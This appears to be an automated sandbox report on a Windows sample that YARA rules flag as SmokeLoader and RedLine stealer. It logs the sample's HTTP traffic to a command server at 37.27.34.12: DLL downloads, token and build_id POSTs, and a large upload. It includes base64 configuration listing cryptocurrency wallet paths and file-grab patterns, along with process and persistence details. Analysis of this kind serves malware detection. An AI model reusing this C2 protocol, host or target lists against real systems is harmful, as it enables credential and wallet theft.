                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Content-Length: 437
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:29 UTC | 437 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 30 63 63 66 38 61 30 36 33 34 62 61 66 64 34 38 39 63 62 31 62 66 61 61 63 61 31 65 30 35 31 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 0d 0a 43 6f 6e 74
                                                            Data Ascii: ------DAKFIDHDGIEGCAKFIIJKContent-Disposition: form-data; name="token"40ccf8a0634bafd489cb1bfaaca1e051------DAKFIDHDGIEGCAKFIIJKContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------DAKFIDHDGIEGCAKFIIJKCont
                                                            2024-05-27 13:24:30 UTC | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:30 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            2024-05-27 13:24:30 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 2ok0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            19 | 192.168.2.8 | 53102 | 37.27.34.12 | 443 | 7360 | C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-27 13:24:30 UTC | 171 | OUT | GET /freebl3.dll HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:31 UTC | 246 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:30 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 685392
                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                            Connection: close
                                                            ETag: "6315a9f4-a7550"
                                                            Accept-Ranges: bytes


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            20 | 192.168.2.8 | 53103 | 37.27.34.12 | 443 | 7360 | C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-27 13:24:32 UTC | 171 | OUT | GET /mozglue.dll HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:33 UTC | 246 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:32 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 608080
                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                            Connection: close
                                                            ETag: "6315a9f4-94750"
                                                            Accept-Ranges: bytes


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            21 | 192.168.2.8 | 53104 | 37.27.34.12 | 443 | 7360 | C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-27 13:24:34 UTC | 172 | OUT | GET /msvcp140.dll HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:34 UTC | 246 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:34 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 450024
                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                            Connection: close
                                                            ETag: "6315a9f4-6dde8"
                                                            Accept-Ranges: bytes


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            22 | 192.168.2.8 | 53105 | 37.27.34.12 | 443 | 7360 | C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-27 13:24:36 UTC | 168 | OUT | GET /nss3.dll HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:36 UTC | 248 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:36 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 2046288
                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                            Connection: close
                                                            ETag: "6315a9f4-1f3950"
                                                            Accept-Ranges: bytes
                                                            Data Ascii: HukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-MmM^_[]
                                                            2024-05-27 13:24:36 UTC16384INData Raw: f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 09 85 ff 75 0a e9 69 03 00 00 c6 44 02
                                                            Data Ascii: WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$RttuiD
                                                            2024-05-27 13:24:36 UTC16384INData Raw: c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 00 00 e9 36 f8 ff ff 8b 40 14 e9 d1 e9
                                                            Data Ascii: D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$6@


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            23 | 192.168.2.8 | 53106 | 37.27.34.12 | 443 | 7360 | C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-27 13:24:39 UTC | 172 | OUT | GET /softokn3.dll HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:39 UTC | 246 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:39 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 257872
                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                            Connection: close
                                                            ETag: "6315a9f4-3ef50"
                                                            Accept-Ranges: bytes


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            24 | 192.168.2.8 | 53107 | 37.27.34.12 | 443 | 7360 | C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-27 13:24:40 UTC | 176 | OUT | GET /vcruntime140.dll HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:41 UTC | 245 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:40 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 80880
                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                            Connection: close
                                                            ETag: "6315a9f4-13bf0"
                                                            Accept-Ranges: bytes


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            25 | 192.168.2.8 | 53108 | 37.27.34.12 | 443 | 7360 | C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-27 13:24:42 UTC | 277 | OUT | POST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----HIDAFHDHCBGDGCBGCGII
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Content-Length: 1081
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:42 UTC1081OUTData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 46 48 44 48 43 42 47 44 47 43 42 47 43 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 30 63 63 66 38 61 30 36 33 34 62 61 66 64 34 38 39 63 62 31 62 66 61 61 63 61 31 65 30 35 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 46 48 44 48 43 42 47 44 47 43 42 47 43 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 46 48 44 48 43 42 47 44 47 43 42 47 43 47 49 49 0d 0a 43 6f 6e 74
                                                            Data Ascii: ------HIDAFHDHCBGDGCBGCGIIContent-Disposition: form-data; name="token"40ccf8a0634bafd489cb1bfaaca1e051------HIDAFHDHCBGDGCBGCGIIContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------HIDAFHDHCBGDGCBGCGIICont
                                                            2024-05-27 13:24:43 UTC | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:43 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            2024-05-27 13:24:43 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 2ok0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            26 | 192.168.2.8 | 53109 | 37.27.34.12 | 443 | 7360 | C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-27 13:24:46 UTC | 276 | OUT | POST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----CBGCBGCAFIIECBFIDHIJ
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Content-Length: 331
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:46 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 30 63 63 66 38 61 30 36 33 34 62 61 66 64 34 38 39 63 62 31 62 66 61 61 63 61 31 65 30 35 31 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 0d 0a 43 6f 6e 74
                                                            Data Ascii: ------CBGCBGCAFIIECBFIDHIJContent-Disposition: form-data; name="token"40ccf8a0634bafd489cb1bfaaca1e051------CBGCBGCAFIIECBFIDHIJContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------CBGCBGCAFIIECBFIDHIJCont
                                                            2024-05-27 13:24:46 UTC | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:46 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            2024-05-27 13:24:46 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                            Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            27 | 192.168.2.8 | 53110 | 37.27.34.12 | 443 | 7360 | C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-27 13:24:47 UTC | 276 | OUT | POST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----IJEHIDHDAKJDHJKEBFIE
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Content-Length: 331
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:47 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 48 49 44 48 44 41 4b 4a 44 48 4a 4b 45 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 30 63 63 66 38 61 30 36 33 34 62 61 66 64 34 38 39 63 62 31 62 66 61 61 63 61 31 65 30 35 31 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 49 44 48 44 41 4b 4a 44 48 4a 4b 45 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 49 44 48 44 41 4b 4a 44 48 4a 4b 45 42 46 49 45 0d 0a 43 6f 6e 74
                                                            Data Ascii: ------IJEHIDHDAKJDHJKEBFIEContent-Disposition: form-data; name="token"40ccf8a0634bafd489cb1bfaaca1e051------IJEHIDHDAKJDHJKEBFIEContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------IJEHIDHDAKJDHJKEBFIECont
                                                            2024-05-27 13:24:48 UTC | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:48 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            2024-05-27 13:24:48 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            28 | 192.168.2.8 | 53111 | 37.27.34.12 | 443 | 7360 | C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-27 13:24:49 UTC | 276 | OUT | POST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----FCBAEHCAEGDHJKFHJKFI
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Content-Length: 331
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:49 UTC | 331 | OUT
                                                            Data Ascii: ------FCBAEHCAEGDHJKFHJKFIContent-Disposition: form-data; name="token"40ccf8a0634bafd489cb1bfaaca1e051------FCBAEHCAEGDHJKFHJKFIContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------FCBAEHCAEGDHJKFHJKFICont
                                                            2024-05-27 13:24:49 UTC | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:49 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            2024-05-27 13:24:49 UTC | 1524 | IN
                                                            Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            29 | 192.168.2.8 | 53112 | 37.27.34.12 | 443 | 7360 | C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-27 13:24:50 UTC | 276 | OUT | POST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----BFCAAEHJDBKJJKFHJEBK
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Content-Length: 453
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:50 UTC | 453 | OUT
                                                            Data Ascii: ------BFCAAEHJDBKJJKFHJEBKContent-Disposition: form-data; name="token"40ccf8a0634bafd489cb1bfaaca1e051------BFCAAEHJDBKJJKFHJEBKContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------BFCAAEHJDBKJJKFHJEBKCont
                                                            2024-05-27 13:24:51 UTC | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:51 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            2024-05-27 13:24:51 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 2ok0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            30 | 192.168.2.8 | 53113 | 37.27.34.12 | 443 | 7360 | C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-27 13:24:52 UTC | 279 | OUT | POST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----BKFBAKFCBFHIJJJJDBFC
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Content-Length: 113601
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:52 UTC | 16355 | OUT
                                                            Data Ascii: ------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="token"40ccf8a0634bafd489cb1bfaaca1e051------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------BKFBAKFCBFHIJJJJDBFCCont
                                                            2024-05-27 13:24:52 UTC | 16355 | OUT
                                                            2024-05-27 13:24:52 UTC | 16355 | OUT
                                                            2024-05-27 13:24:52 UTC | 16355 | OUT
                                                            2024-05-27 13:24:52 UTC | 16355 | OUT
                                                            2024-05-27 13:24:52 UTC | 16355 | OUT
                                                            2024-05-27 13:24:52 UTC | 15471 | OUT
                                                            2024-05-27 13:24:54 UTC | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:54 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            2024-05-27 13:24:54 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 2ok0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            31 | 192.168.2.8 | 53114 | 37.27.34.12 | 443 | 7360 | C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-27 13:24:55 UTC | 276 | OUT | POST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----KECFIDGCBFBAKEBFBKFB
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Content-Length: 331
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:55 UTC | 331 | OUT
                                                            Data Ascii: ------KECFIDGCBFBAKEBFBKFBContent-Disposition: form-data; name="token"40ccf8a0634bafd489cb1bfaaca1e051------KECFIDGCBFBAKEBFBKFBContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------KECFIDGCBFBAKEBFBKFBCont
                                                            2024-05-27 13:24:56 UTC | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:56 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            2024-05-27 13:24:56 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Target ID:0
                                                            Start time:09:22:57
                                                            Start date:27/05/2024
                                                            Path:C:\Users\user\Desktop\xvJv1BpknZ.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\xvJv1BpknZ.exe"
                                                            Imagebase:0x400000
                                                            File size:247'296 bytes
                                                            MD5 hash:C5261E67BD6D58771E27D7214E8F1C8F
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1419284680.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1419307805.0000000002120000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1419307805.0000000002120000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1419568302.0000000003C01000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1419568302.0000000003C01000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1419421544.0000000002153000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:09:23:03
                                                            Start date:27/05/2024
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Explorer.EXE
                                                            Imagebase:0x7ff62d7d0000
                                                            File size:5'141'208 bytes
                                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:6
                                                            Start time:09:23:23
                                                            Start date:27/05/2024
                                                            Path:C:\Users\user\AppData\Roaming\etrtabd
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Roaming\etrtabd
                                                            Imagebase:0x400000
                                                            File size:247'296 bytes
                                                            MD5 hash:C5261E67BD6D58771E27D7214E8F1C8F
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
